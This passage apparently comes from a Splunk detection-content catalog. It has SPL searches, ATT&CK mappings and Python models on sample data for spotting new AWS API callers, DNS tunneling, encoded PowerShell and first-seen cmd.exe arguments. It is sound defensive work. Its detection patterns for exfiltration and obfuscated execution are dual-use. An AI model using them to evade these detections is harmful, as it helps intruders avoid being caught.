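BOB = "arn:aws:iam::123456789012:user/bob"      # same burst, too few data points
CAROL = "arn:aws:iam::123456789012:user/carol"  # never baselined
DAVE = "arn:aws:iam::123456789012:user/dave"    # in lookup, idle this run

SAMPLE_BASELINE = {
    ALICE: Baseline(avg=40.0, stdev=5.0, n=100),
    BOB: Baseline(avg=40.0, stdev=5.0, n=10),
    DAVE: Baseline(avg=40.0, stdev=5.0, n=100),
}
SAMPLE_COUNTS = {ALICE: 400, BOB: 400, CAROL: 400}


def demo() -> Tuple[Dict[str, Baseline], List[str]]:
    """Run one cycle over the constructed data; only ALICE should spike."""
    return run_detection(SAMPLE_BASELINE, SAMPLE_COUNTS)


if __name__ == "__main__":
    updated, spikes = demo()
    for arn, row in updated.items():
        print(f"{arn}: avg={row.avg} stdev={row.stdev} n={row.n}")
    print("spikes:", spikes)
```

Bob's burst is identical to Alice's but is suppressed by `dataPointThreshold`, and Carol is never evaluated because her baseline row stays null; both are the tuning knobs the text describes.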

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Based on the values of `dataPointThreshold` and `deviationThreshold`, the false-positive rate may vary. Please modify these according to your environment.

Reference

Test Dataset

version: 1


Detect usb device insertion

The search is used to detect hosts that generate Windows Event ID 4663 for successful attempts to write to or read from a removable storage device, and Event ID 4656 for failures, which occurs when a USB drive is plugged in. In this scenario we are querying the Change_Analysis data model to look for Windows Event ID 4656 or 4663 where the priority of the affected host is marked as high in the ES Assets and Identity Framework.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change_Analysis
  • ATT&CK:
  • Last Updated: 2017-11-27

Search

| tstats `security_content_summariesonly` count earliest(_time) AS earliest latest(_time) AS latest from datamodel=Change_Analysis where (nodename = All_Changes) All_Changes.result="Removable Storage device" (All_Changes.result_id=4663 OR All_Changes.result_id=4656) (All_Changes.src_priority=high) by All_Changes.dest | `drop_dm_object_name("All_Changes")` | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | `detect_usb_device_insertion_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663 and 4656. Ensure that the field from the event logs is being mapped to the result_id field in the Change_Analysis data model. To minimize the alert volume, this search leverages the Assets and Identity framework to filter out events from those assets not marked high priority in the Enterprise Security Assets and Identity Framework.

Required field

Kill Chain Phase

  • Installation
  • Actions on Objectives


Known False Positives

Legitimate USB activity will also be detected. Please verify and investigate as appropriate.

Reference

Test Dataset

version: 1


Detect new api calls from user roles

This search detects new API calls that have either never been seen before or that have not been seen in the previous hour, where the identity type is `AssumedRole`.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2018-04-16

Search

`cloudtrail` eventType=AwsApiCall errorCode=success userIdentity.type=AssumedRole [search `cloudtrail` eventType=AwsApiCall errorCode=success userIdentity.type=AssumedRole | stats earliest(_time) as earliest latest(_time) as latest by userName eventName | inputlookup append=t previously_seen_api_calls_from_user_roles | stats min(earliest) as earliest, max(latest) as latest by userName eventName | outputlookup previously_seen_api_calls_from_user_roles | eval newApiCallfromUserRole=if(earliest>=relative_time(now(), "-70m@m"), 1, 0) | where newApiCallfromUserRole=1 | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | table eventName userName] |rename userName as user | stats values(eventName) earliest(_time) as earliest latest(_time) as latest by user | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | `detect_new_api_calls_from_user_roles_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously seen API call per user roles in CloudTrail" support search once to create a history of previously seen user roles.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

It is possible that there are legitimate user roles making new or infrequently used API calls in your infrastructure, causing the search to trigger.

Reference

Test Dataset

version: 1


Detect new user aws console login

This search looks for CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour. Deprecated: this search has been updated to use the Authentication data model.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

`cloudtrail` eventName=ConsoleLogin | rename userIdentity.arn as user | stats earliest(_time) as firstTime latest(_time) as lastTime by user | inputlookup append=t previously_seen_users_console_logins_cloudtrail | stats min(firstTime) as firstTime max(lastTime) as lastTime by user | eval userStatus=if(firstTime >= relative_time(now(), "-70m@m"), "First Time Logging into AWS Console","Previously Seen User") | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | where userStatus ="First Time Logging into AWS Console" | `detect_new_user_aws_console_login_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. Run the "Previously seen users in CloudTrail" support search only once to create a baseline of previously seen IAM users within the last 30 days. Run "Update previously seen users in CloudTrail" hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

When a legitimate new user logins for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate.

Reference

Test Dataset

version: 2


Detect web traffic to dynamic domain providers

This search looks for web connections to dynamic DNS providers.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Web
  • ATT&CK: T1071.001
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count values(Web.url) as url min(_time) as firstTime from datamodel=Web where Web.status=200 by Web.src Web.dest Web.status | `drop_dm_object_name("Web")` | `security_content_ctime(firstTime)` | `dynamic_dns_web_traffic` | `detect_web_traffic_to_dynamic_domain_providers_filter`

Associated Analytic Story


How To Implement

This search requires you to be ingesting web-traffic logs. You can obtain these logs from indexing data from a web proxy or by using a network-traffic-analysis tool, such as Bro or Splunk Stream. The web data model must contain the URL being requested, the IP address of the host initiating the request, and the destination IP. This search also leverages a lookup file, `dynamic_dns_providers_default.csv`, which contains a non-exhaustive list of dynamic DNS providers. Consider periodically updating this local lookup file with new domains.

This search produces a field (`isDynDNS`) that is not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. This field contributes additional context to the notable. To see the additional metadata, add the following field, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):

  1. **Label:** IsDynamicDNS, **Field:** isDynDNS

Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details`

Deprecated because it duplicates another detection.

Required field

ATT&CK

ID Technique Tactic
T1071.001 Web Protocols Command and Control


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

It is possible that the list of dynamic DNS providers is outdated and/or that the URL being requested is legitimate.

Reference

Test Dataset

version: 2


Detection of dns tunnels

This search is used to detect DNS tunneling by calculating the sum of the lengths of DNS queries and DNS answers per source. The search also reduces potential false positives by filtering out queries made to internal systems and queries originating from internal DNS, web, and email servers. Endpoints using DNS as a method of transmission for data exfiltration, command and control, or evasion of security controls can often be detected by noting an unusually large volume of DNS traffic. Deprecated because an existing detection does the same.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Network_Resolution
  • ATT&CK: T1048.003
  • Last Updated: 2017-09-18

Search

| tstats `security_content_summariesonly` dc("DNS.query") as count from datamodel=Network_Resolution where nodename=DNS "DNS.message_type"="QUERY" NOT (`cim_corporate_web_domain_search("DNS.query")`) NOT "DNS.query"="*.in-addr.arpa" NOT ("DNS.src_category"="svc_infra_dns" OR "DNS.src_category"="svc_infra_webproxy" OR "DNS.src_category"="svc_infra_email*" ) by "DNS.src","DNS.query" | rename "DNS.src" as src "DNS.query" as message | eval length=len(message) | stats sum(length) as length by src | append [ tstats `security_content_summariesonly` dc("DNS.answer") as count from datamodel=Network_Resolution where nodename=DNS "DNS.message_type"="QUERY" NOT (`cim_corporate_web_domain_search("DNS.query")`) NOT "DNS.query"="*.in-addr.arpa" NOT ("DNS.src_category"="svc_infra_dns" OR "DNS.src_category"="svc_infra_webproxy" OR "DNS.src_category"="svc_infra_email*" ) by "DNS.src","DNS.answer" | rename "DNS.src" as src "DNS.answer" as message | eval message=if(message=="unknown","", message) | eval length=len(message) | stats sum(length) as length by src ] | stats sum(length) as length by src | where length > 10000 | `detection_of_dns_tunnels_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, we must ensure that DNS data is being ingested and mapped to the appropriate fields in the Network_Resolution data model. Fields like src_category are automatically provided by the Assets and Identity Framework shipped with Splunk Enterprise Security. You will need to ensure you are using the Assets and Identity Framework and populating the src_category field. You will also need to enable the `cim_corporate_web_domain_search()` macro which will essentially filter out the DNS queries made to the corporate web domains to reduce alert fatigue.

Required field

ATT&CK

ID Technique Tactic
T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol Exfiltration


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

It's possible that normal DNS traffic will exhibit this behavior. If an alert is generated, please investigate and validate as appropriate. The threshold can also be modified to better suit your environment.

Reference

Test Dataset

version: 2


Ec2 instance modified with previously unseen user

This search looks for EC2 instances being modified by users who have not previously modified them. This search is deprecated and has been translated to use the latest Change data model.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

`cloudtrail` `ec2_modification_api_calls` [search `cloudtrail` `ec2_modification_api_calls` errorCode=success | stats earliest(_time) as firstTime latest(_time) as lastTime by userIdentity.arn | rename userIdentity.arn as arn | inputlookup append=t previously_seen_ec2_modifications_by_user | stats min(firstTime) as firstTime, max(lastTime) as lastTime by arn | outputlookup previously_seen_ec2_modifications_by_user | eval newUser=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newUser=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=dest responseElements.instancesSet.items{}.instanceId | spath output=user userIdentity.arn | table _time, user, dest | `ec2_instance_modified_with_previously_unseen_user_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously Seen EC2 Launches By User" support search once to create a history of previously seen ARNs. To add or remove APIs that modify an EC2 instance, edit the macro `ec2_modification_api_calls`.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

It's possible that a new user will start to modify EC2 instances when they haven't before for any number of reasons. Verify with the user that is modifying instances that this is the intended behavior.

Reference

Test Dataset

version: 3


Ec2 instance started in previously unseen region

This search looks for CloudTrail events where an instance is started in a particular region in the last hour and then compares it to a lookup file of previously seen regions where an instance was started.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1535
  • Last Updated: 2018-02-23

Search

`cloudtrail` earliest=-1h StartInstances | stats earliest(_time) as earliest latest(_time) as latest by awsRegion | inputlookup append=t previously_seen_aws_regions.csv | stats min(earliest) as earliest max(latest) as latest by awsRegion | outputlookup previously_seen_aws_regions.csv | eval regionStatus=if(earliest >= relative_time(now(),"-1d@d"), "Instance Started in a New Region","Previously Seen Region") | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | where regionStatus="Instance Started in a New Region" | `ec2_instance_started_in_previously_unseen_region_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. Run the "Previously seen AWS Regions" support search only once to create a baseline of previously seen regions. This search is deprecated and has been translated to use the latest Change data model.

Required field

ATT&CK

ID Technique Tactic
T1535 Unused/Unsupported Cloud Regions Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It's possible that a user has unknowingly started an instance in a new region. Please verify that this activity is legitimate.

Reference

Test Dataset

version: 1


Ec2 instance started with previously unseen ami

This search looks for EC2 instances being created with previously unseen AMIs. This search is deprecated and has been translated to use the latest Change data model.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2018-03-12

Search

`cloudtrail` eventName=RunInstances [search `cloudtrail` eventName=RunInstances errorCode=success | stats earliest(_time) as firstTime latest(_time) as lastTime by requestParameters.instancesSet.items{}.imageId | rename requestParameters.instancesSet.items{}.imageId as amiID | inputlookup append=t previously_seen_ec2_amis.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by amiID | outputlookup previously_seen_ec2_amis.csv | eval newAMI=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | where newAMI=1 | rename amiID as requestParameters.instancesSet.items{}.imageId | table requestParameters.instancesSet.items{}.imageId] | rename requestParameters.instanceType as instanceType, responseElements.instancesSet.items{}.instanceId as dest, userIdentity.arn as arn, requestParameters.instancesSet.items{}.imageId as amiID | table firstTime, lastTime, arn, amiID, dest, instanceType | `ec2_instance_started_with_previously_unseen_ami_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously Seen EC2 AMIs" support search once to create a history of previously seen AMIs.

Required field

Kill Chain Phase

Known False Positives

After a new AMI is created, the first systems created with that AMI will cause this alert to fire. Verify that the AMI being used was created by a legitimate user.

Reference

Test Dataset

version: 1


Ec2 instance started with previously unseen instance type

This search looks for EC2 instances being created with previously unseen instance types. This search is deprecated and has been translated to use the latest Change data model.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-02-07

Search

`cloudtrail` eventName=RunInstances [search `cloudtrail` eventName=RunInstances errorCode=success | fillnull value="m1.small" requestParameters.instanceType | stats earliest(_time) as earliest latest(_time) as latest by requestParameters.instanceType | rename requestParameters.instanceType as instanceType | inputlookup append=t previously_seen_ec2_instance_types.csv | stats min(earliest) as earliest max(latest) as latest by instanceType | outputlookup previously_seen_ec2_instance_types.csv | eval newType=if(earliest >= relative_time(now(), "-70m@m"), 1, 0) | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | where newType=1 | rename instanceType as requestParameters.instanceType | table requestParameters.instanceType] | spath output=user userIdentity.arn | rename requestParameters.instanceType as instanceType, responseElements.instancesSet.items{}.instanceId as dest | table _time, user, dest, instanceType | `ec2_instance_started_with_previously_unseen_instance_type_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously Seen EC2 Instance Types" support search once to create a history of previously seen instance types.

Required field

Kill Chain Phase

Known False Positives

It is possible that an admin will create a new system using a new instance type never used before. Verify with the creator that they intended to create the system with the new instance type.

Reference

Test Dataset

version: 2


Ec2 instance started with previously unseen user

This search looks for EC2 instances being created by users who have not created them before. This search is deprecated and has been translated to use the latest Change data model.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

`cloudtrail` eventName=RunInstances [search `cloudtrail` eventName=RunInstances errorCode=success | stats earliest(_time) as firstTime latest(_time) as lastTime by userIdentity.arn | rename userIdentity.arn as arn | inputlookup append=t previously_seen_ec2_launches_by_user.csv | stats min(firstTime) as firstTime, max(lastTime) as lastTime by arn | outputlookup previously_seen_ec2_launches_by_user.csv | eval newUser=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newUser=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename arn as userIdentity.arn | table userIdentity.arn] | rename requestParameters.instanceType as instanceType, responseElements.instancesSet.items{}.instanceId as dest, userIdentity.arn as user | table _time, user, dest, instanceType | `ec2_instance_started_with_previously_unseen_user_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously Seen EC2 Launches By User" support search once to create a history of previously seen ARNs.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

It's possible that a user will start to create EC2 instances when they haven't before for any number of reasons. Verify with the user that is launching instances that this is the intended behavior.

Reference

Test Dataset

version: 2


Execution of file with spaces before extension

This search looks for processes launched from files with at least five spaces in the name before the extension. This is typically done to obfuscate the file extension by pushing it outside of the default view.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1036.003
  • Last Updated: 2020-11-19

Search

| tstats `security_content_summariesonly` count values(Processes.process_path) as process_path min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "* .*" by Processes.dest Processes.user Processes.process Processes.process_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `execution_of_file_with_spaces_before_extension_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records process activity from your hosts to populate the endpoint data model in the processes node. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

ID Technique Tactic
T1036.003 Rename System Utilities Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference

Test Dataset

version: 3


Extended period without successful netbackup backups

This search returns a list of hosts that have not successfully completed a backup in over a week. Deprecated because it is an infrastructure monitoring search.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2017-09-12

Search

`netbackup` MESSAGE="Disk/Partition backup completed successfully." | stats latest(_time) as latestTime by COMPUTERNAME | `security_content_ctime(latestTime)` | rename COMPUTERNAME as dest | eval isOutlier=if(latestTime <= relative_time(now(), "-7d@d"), 1, 0) | search isOutlier=1 | table latestTime, dest | `extended_period_without_successful_netbackup_backups_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to first obtain data from your backup solution, either from the backup logs on your hosts, or from a central server responsible for performing the backups. If you do not use Netbackup, you can modify this search for your backup solution. Depending on how often you backup your systems, you may want to modify how far in the past to look for a successful backup, other than the default of seven days.

Required field

Kill Chain Phase

Known False Positives

None identified

Reference

Test Dataset

version: 1


First time seen command line argument

This search looks for command-line arguments that use a `/c` parameter to execute a command that has not previously been seen.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1059.001, T1059.003
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = cmd.exe Processes.process = "* /c *" by Processes.process Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search [ | tstats `security_content_summariesonly` earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = cmd.exe Processes.process = "* /c *" by Processes.process | `drop_dm_object_name(Processes)` | inputlookup append=t previously_seen_cmd_line_arguments | stats min(firstTime) as firstTime, max(lastTime) as lastTime by process | outputlookup previously_seen_cmd_line_arguments | eval newCmdLineArgument=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newCmdLineArgument=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table process] | `first_time_seen_command_line_argument_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must be ingesting logs with both the process name and command line from your endpoints. The complete process name with command-line arguments is mapped to the "process" field in the Endpoint data model. Please make sure you run the support search "Previously seen command line arguments", which creates a lookup file called `previously_seen_cmd_line_arguments.csv`, a historical baseline of all command-line arguments. You must also validate this list. For the search to calculate accurately, ensure the search scheduling interval matches the value used in the `relative_time` evaluation function.
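An added example, not Splunk's own code: a Python model of this search's baseline logic (the cmd.exe `/c` filter, the merge with the previously seen lookup keeping min firstTime and max lastTime per command line, and the `-70m@m` window). The event rows, baseline entries and timestamps are constructed sample data.

```python
from datetime import datetime, timedelta, timezone

# Constructed reference time for the run; the SPL uses now().
NOW = datetime(2020, 7, 21, 12, 0, 30, tzinfo=timezone.utc)

# Constructed sample Endpoint.Processes events.
EVENTS = [
    {"time": NOW - timedelta(minutes=10), "process_name": "cmd.exe",
     "process": "cmd.exe /c whoami", "parent_process_name": "explorer.exe", "dest": "ws01"},
    {"time": NOW - timedelta(minutes=5), "process_name": "cmd.exe",
     "process": "cmd.exe /c ipconfig /all", "parent_process_name": "explorer.exe", "dest": "ws02"},
    # Older than the 70-minute window: a missed scheduled run would baseline it silently.
    {"time": NOW - timedelta(hours=2), "process_name": "cmd.exe",
     "process": "cmd.exe /c dir C:\\Temp", "parent_process_name": "cmd.exe", "dest": "ws03"},
    # Excluded: not cmd.exe, and not a "/c" invocation respectively.
    {"time": NOW - timedelta(minutes=3), "process_name": "powershell.exe",
     "process": "powershell.exe -c Get-Date", "parent_process_name": "explorer.exe", "dest": "ws01"},
    {"time": NOW - timedelta(minutes=1), "process_name": "cmd.exe",
     "process": "cmd.exe /k dir", "parent_process_name": "explorer.exe", "dest": "ws01"},
]

# Constructed stand-in for previously_seen_cmd_line_arguments.csv: process -> (firstTime, lastTime).
BASELINE = {
    "cmd.exe /c whoami": (NOW - timedelta(days=30), NOW - timedelta(days=1)),
}


def is_cmd_slash_c(process_name, process):
    """Mirror of: Processes.process_name = cmd.exe Processes.process = "* /c *" (case-insensitive)."""
    return process_name.lower() == "cmd.exe" and " /c " in process.lower()


def relative_time_snapped(now, minutes):
    """Model of relative_time(now(), "-<minutes>m@m"): subtract, then snap down to the minute."""
    return (now - timedelta(minutes=minutes)).replace(second=0, microsecond=0)


def update_baseline(events, baseline):
    """Inner subsearch: append the lookup, keep min(firstTime) and max(lastTime) per process.

    Returns the merged dict that outputlookup would write back to the CSV.
    """
    merged = dict(baseline)
    for ev in events:
        if not is_cmd_slash_c(ev["process_name"], ev["process"]):
            continue
        t = ev["time"]
        first, last = merged.get(ev["process"], (t, t))
        merged[ev["process"]] = (min(first, t), max(last, t))
    return merged


def new_command_lines(merged, now, window_minutes=70):
    """newCmdLineArgument=1: firstTime within the scheduling window, hence never seen before."""
    cutoff = relative_time_snapped(now, window_minutes)
    return sorted(p for p, (first, _) in merged.items() if first >= cutoff)


def detect(events, baseline, now):
    """Outer tstats: rows per (process, process_name, parent, dest), restricted to new command lines."""
    new = set(new_command_lines(update_baseline(events, baseline), now))
    rows = {}
    for ev in events:
        if not is_cmd_slash_c(ev["process_name"], ev["process"]) or ev["process"] not in new:
            continue
        key = (ev["process"], ev["process_name"], ev["parent_process_name"], ev["dest"])
        first, last = rows.get(key, (ev["time"], ev["time"]))
        rows[key] = (min(first, ev["time"]), max(last, ev["time"]))
    return [
        {"process": k[0], "process_name": k[1], "parent_process_name": k[2],
         "dest": k[3], "firstTime": v[0], "lastTime": v[1]}
        for k, v in sorted(rows.items())
    ]


if __name__ == "__main__":
    for row in detect(EVENTS, BASELINE, NOW):
        print(row["dest"], row["parent_process_name"], "->", row["process"])
```

Only the ipconfig command line is reported: whoami is already in the baseline, and the two-hour-old dir invocation shows why a scheduling interval wider than the `relative_time` window quietly adds entries to the baseline without alerting.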

Required field

ATT&CK

| ID | Technique | Tactic |
| --- | --- | --- |
| T1059.001 | PowerShell | Execution |
| T1059.003 | Windows Command Shell | Execution |


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

Legitimate programs can also use command-line arguments to execute. Please verify the command-line arguments to check what command or program is being executed. We recommend customizing the `first_time_seen_cmd_line_filter` macro to exclude legitimate parent_process_name values.

Reference

Test Dataset

version: 5


Gcp gcr container uploaded

This search shows information on uploaded containers, including source user, account, action, bucket name, event name, HTTP user agent, message and destination path.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1525
  • Last Updated: 2020-02-20

Search

|tstats count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Cloud_Infrastructure.Storage where Storage.event_name=storage.objects.create by Storage.src_user Storage.account Storage.action Storage.bucket_name Storage.event_name Storage.http_user_agent Storage.msg Storage.object_path | `drop_dm_object_name("Storage")` | `gcp_gcr_container_uploaded_filter`

Associated Analytic Story


How To Implement

You must install the GCP App for Splunk (version 2.0.0 or later), then configure Stackdriver and set up a Pub/Sub subscription to be imported into Splunk. You must also install the Cloud Infrastructure data model. Please also customize the `container_implant_gcp_detection_filter` macro to filter out false positives.

Required field

ATT&CK

| ID | Technique | Tactic |
| --- | --- | --- |
| T1525 | Implant Container Image | Persistence |


Kill Chain Phase

Known False Positives

Uploading a container is normal behavior for developers or users with access to the container registry. GCP GCR registers a container upload as a Storage event, so this search must be considered in the context of container upload creation, which automatically generates a bucket entry for the destination path.

Reference

Test Dataset

version: 1


Identify new user accounts

This detection search will help profile user accounts in your environment by identifying newly created accounts that have been added to your network in the past week.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.002
  • Last Updated: 2017-09-12

Search

| from datamodel Identity_Management.All_Identities | eval empStatus=case((now()-startDate)<604800, "Accounts created in last week") | search empStatus="Accounts created in last week" | `security_content_ctime(endDate)` | `security_content_ctime(startDate)` | table identity empStatus endDate startDate | `identify_new_user_accounts_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be populating the Enterprise Security Identity_Management data model in the assets and identity framework.

Required field

ATT&CK

| ID | Technique | Tactic |
| --- | --- | --- |
| T1078.002 | Domain Accounts | Defense Evasion, Initial Access, Persistence, Privilege Escalation |


Kill Chain Phase

Known False Positives

If the Identity_Management data model is not updated regularly, this search could give you false positive alerts. Please consider this and investigate appropriately.

Reference

Test Dataset

version: 1


Malicious powershell process - multiple suspicious command-line arguments

This search looks for PowerShell processes started with a base64-encoded command line passed to them, with parameters to modify the execution policy for the process, and those that prevent the display of an interactive prompt to the user. This combination of command-line options is suspicious because it overrides the default PowerShell execution policy, attempts to hide itself from the user, and passes an encoded script to be run on the command line. Deprecated because it is almost the same as Malicious PowerShell Process - Encoded Command.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1059.001
  • Last Updated: 2021-01-19

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=powershell.exe by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search (process=*-EncodedCommand* OR process=*-enc*) process=*-Exec* | `malicious_powershell_process___multiple_suspicious_command_line_arguments_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

| ID | Technique | Tactic |
| --- | --- | --- |
| T1059.001 | PowerShell | Execution |


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

Legitimate processes can have this combination of command-line options, but it is not common.

Reference

Test Dataset

version: 6


Monitor dns for brand abuse

This search looks for DNS requests for faux domains similar to the domains that you want to have monitored for abuse.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Network_Resolution
  • ATT&CK:
  • Last Updated: 2017-09-23

Search

| tstats `security_content_summariesonly` values(DNS.answer) as IPs min(_time) as firstTime from datamodel=Network_Resolution by DNS.src, DNS.query | `drop_dm_object_name("DNS")` | `security_content_ctime(firstTime)` | `brand_abuse_dns` | `monitor_dns_for_brand_abuse_filter`

Associated Analytic Story


How To Implement

You need to ingest data from your DNS logs. Specifically, you must ingest the domain that is being queried and the IP of the host originating the request. Ideally, you should also be ingesting the answer to the query and the query type. This approach also allows you to create your own localized passive DNS capability, which can aid you in future investigations. You also need to have run the search "ESCU - DNSTwist Domain Names", which creates the permutations of the domain that will be checked for.

Required field

Kill Chain Phase

  • Delivery
  • Actions on Objectives


Known False Positives

None at this time

Reference

Test Dataset

version: 1


Open redirect in splunk web

This search allows you to look for evidence of exploitation for CVE-2016-4859, the Splunk Open Redirect Vulnerability.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2017-09-19

Search

index=_internal sourcetype=splunk_web_access return_to="/%09/*" | `open_redirect_in_splunk_web_filter`

Associated Analytic Story


How To Implement

No extra steps needed to implement this search.

Required field

Kill Chain Phase

  • Delivery


Known False Positives

None identified

Reference

Test Dataset

version: 1


Osquery pack - coldroot detection

This search looks for ColdRoot events from the osx-attacks osquery pack.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
